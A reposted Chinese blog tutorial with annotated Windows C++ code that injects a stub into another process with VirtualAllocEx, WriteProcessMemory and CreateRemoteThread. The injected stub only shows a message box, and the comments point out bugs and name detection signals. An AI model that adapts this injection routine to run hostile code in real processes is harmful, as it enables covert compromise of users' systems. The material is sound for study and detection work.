• C语言实现远程代码注入


    #include <windows.h>
    #include <iostream>
    #define STRLEN 20
    
    //Parameter block handed to the remote thread. It is copied verbatim into the
    //target process with WriteProcessMemory, so it holds only plain values and
    //fixed-size char arrays: no pointers into this process, no std::string.
    typedef struct _DATA
    {
        //kernel32 export addresses resolved by InjectCode. The remote stub calls
        //through these because it cannot use the injector's import table; storing
        //them as DWORD only holds a full pointer on a 32-bit build.
        DWORD dwLoadLibrary;
        DWORD dwGetProcAddress;
        DWORD dwGetModuleHandle;
        DWORD dwGetModuleFileName;
    
        //Names the stub resolves at runtime plus the message text. STRLEN (20) has
        //to cover the longest of them with its terminator ("Code Inject !!!" is 15).
        char User32Dll[STRLEN];
        char MessageBox[STRLEN];
        char Str[STRLEN];
    }DATA, *PDATA;
    
    //Body of the thread that InjectCode starts inside the target process. The raw
    //bytes of this function are copied into the target, so it executes at a
    //different address than it was linked at: it must not reach anything through
    //the injector's import table or touch injector globals. Every API it needs is
    //reached via the addresses and strings in the DATA block passed as lpParam.
    //
    //lpParam: pointer, valid in the target's address space, to the DATA block that
    //         InjectCode wrote there.
    //Returns 0 once the message box has been dismissed. Neither the LoadLibrary
    //nor the GetProcAddress result is checked, so a failed lookup ends in a call
    //through a NULL function pointer.
    DWORD WINAPI RemoteThreadProc(LPVOID lpParam)
    {
        PDATA pData = (PDATA)lpParam;
    
        //Function-pointer prototypes for the exports used below. They are spelled
        //with the TCHAR (LPCTSTR/LPTSTR) types but are fed the char arrays from
        //DATA, so this only compiles in a non-UNICODE build.
        HMODULE (__stdcall *MyLoadLibrary)(LPCTSTR);
        FARPROC (__stdcall *MyGetProcAddress)(HMODULE, LPCSTR);
        HMODULE (__stdcall *MyGetModuleHandle)(LPCTSTR);
        int (__stdcall *MyMessageBox)(HWND, LPCTSTR, LPCTSTR, UINT);
        DWORD (__stdcall *MyGetModuleFileName)(HMODULE, LPTSTR, DWORD);
    
        //Point each prototype at the address InjectCode resolved in its own
        //process; this relies on kernel32.dll sitting at the same base address in
        //the target as in the injector.
        MyLoadLibrary = (HMODULE (__stdcall *)(LPCTSTR))pData->dwLoadLibrary;
        MyGetProcAddress = (FARPROC (__stdcall *)(HMODULE, LPCSTR))pData->dwGetProcAddress;
        MyGetModuleHandle = (HMODULE (__stdcall *)(LPCTSTR))pData->dwGetModuleHandle;
        MyGetModuleFileName = (DWORD (__stdcall *)(HMODULE, LPTSTR, DWORD))pData->dwGetModuleFileName;
    
        //Load user32.dll by the name carried in DATA (LoadLibraryA via the resolved address).
        HMODULE hModule = MyLoadLibrary(pData->User32Dll);
        //Resolve MessageBoxA from the module just loaded.
        MyMessageBox = (int (__stdcall *)(HWND, LPCTSTR, LPCTSTR, UINT))
                            MyGetProcAddress(hModule, pData->MessageBox);
        //Buffer for the host process's own image path (GetModuleFileNameA(NULL, ...)).
        //NOTE(review): zero-initialising an array of this size may be compiled into
        //a helper call (memset) that lands in the injector's image, which is not at
        //that address in the target -- a known way for a copied stub to crash.
        char szModuleFileName[MAX_PATH] = {0};
        MyGetModuleFileName(NULL, szModuleFileName, MAX_PATH);
    
        //Visible effect of the injection: a message box whose caption is the path
        //of the process this stub now runs in.
        MyMessageBox(NULL, pData->Str, szModuleFileName, MB_OK);
    
        return 0;
    }
    
    
    //CreateRemoteThread-style injection: copies a DATA block and the bytes of
    //RemoteThreadProc into the process identified by dwPid, starts a thread there
    //at the copied code with the copied DATA as its argument, and blocks until
    //that thread exits.
    //
    //dwPid: id of the target process. Returns silently if it cannot be opened.
    //       None of the later calls check their return values, so a failed
    //       allocation, write or thread creation is carried forward as a NULL
    //       pointer/handle instead of being reported.
    //
    //Detection note: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx with
    //PAGE_EXECUTE_READWRITE -> WriteProcessMemory -> CreateRemoteThread against a
    //foreign pid is the textbook remote-thread injection sequence that EDR
    //products and Sysmon (event 8, CreateRemoteThread) are built to surface.
    void InjectCode(DWORD dwPid)
    {
        //Open the target with full rights; the handle is used for allocation,
        //writes and thread creation below.
        HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE,dwPid);
     
        if(NULL== hProcess)
           return;
     
        DATA Data = {0};
     
        //Resolve the kernel32 exports the stub will call. These addresses are
        //only meaningful in the target if kernel32.dll is mapped at the same base
        //there; the DWORD casts truncate them on a 64-bit build.
        Data.dwLoadLibrary= (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA");
        Data.dwGetProcAddress= (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetProcAddress");
        Data.dwGetModuleHandle= (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetModuleHandleA");
        Data.dwGetModuleFileName= (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetModuleFileNameA");
    
        //Names the stub resolves at runtime (user32.dll / MessageBoxA).
        lstrcpy(Data.User32Dll,"user32.dll");
        lstrcpy(Data.MessageBox,"MessageBoxA");
        //Text shown by the message box inside the target.
        lstrcpy(Data.Str,"Code Inject !!!");
     
        //Place the DATA block in the target. It holds only data, so RWX here is
        //more than least privilege calls for.
        LPVOID lpData = VirtualAllocEx(hProcess, NULL, sizeof(Data),
                         MEM_COMMIT,PAGE_EXECUTE_READWRITE);
        DWORD dwWriteNum = 0;
        WriteProcessMemory(hProcess,lpData, &Data,sizeof(Data), &dwWriteNum);
     
        //Room for the code. 0x4000 is a guessed upper bound, not the real size of
        //RemoteThreadProc (and the variable is a WORD despite its dw prefix).
        WORD dwFunSize = 0x4000;
        LPVOID lpCode = VirtualAllocEx(hProcess, NULL, dwFunSize,
                         MEM_COMMIT,PAGE_EXECUTE_READWRITE);
     
        //Copy 0x4000 bytes starting at &RemoteThreadProc. This assumes that
        //address is the function body itself and that the following 16 KiB of the
        //injector's image are readable; whatever follows the function is copied
        //along with it.
        WriteProcessMemory(hProcess,lpCode,&RemoteThreadProc,
                         dwFunSize,&dwWriteNum);
        //Run the copied code as a new thread in the target with the remote DATA
        //address as its argument, then wait for it (i.e. until the box is closed).
        HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
                         (LPTHREAD_START_ROUTINE)lpCode,
                         lpData,0, NULL);
        WaitForSingleObject(hThread,INFINITE);
     
        CloseHandle(hThread);
        CloseHandle(hProcess);
    }
    
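    //Looks up the process that owns the top-level window titled Name.
    //
    //Name: window caption to match exactly (FindWindow's second argument is a
    //      title, not an executable name).
    //Returns the owning process id, or 0 when no such window exists. The
    //original left the out-variable uninitialised and returned it regardless of
    //whether a window was found; 0 is returned instead so a missing window is
    //distinguishable and OpenProcess on it simply fails.
    int GetProcessID(char *Name)
    {
        HWND hWnd = ::FindWindow(NULL, Name);
        if (NULL == hWnd)
            return 0;
    
        DWORD dwPid = 0;
        ::GetWindowThreadProcessId(hWnd, &dwPid);
        return (int)dwPid;
    }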
    
    //Entry point: resolves the target by window title and injects into it.
    int main()
    {
    
        int ppid;
    
        //GetProcessID uses FindWindow, so "lyshark.exe" is matched against a
        //window caption, not an image name. Nothing here checks that a window was
        //found before the resulting pid is handed to InjectCode.
        ppid = ::GetProcessID("lyshark.exe");
        InjectCode(ppid);
    
    
        return 0;
    }
  • 原文地址:https://www.cnblogs.com/LyShark/p/11066070.html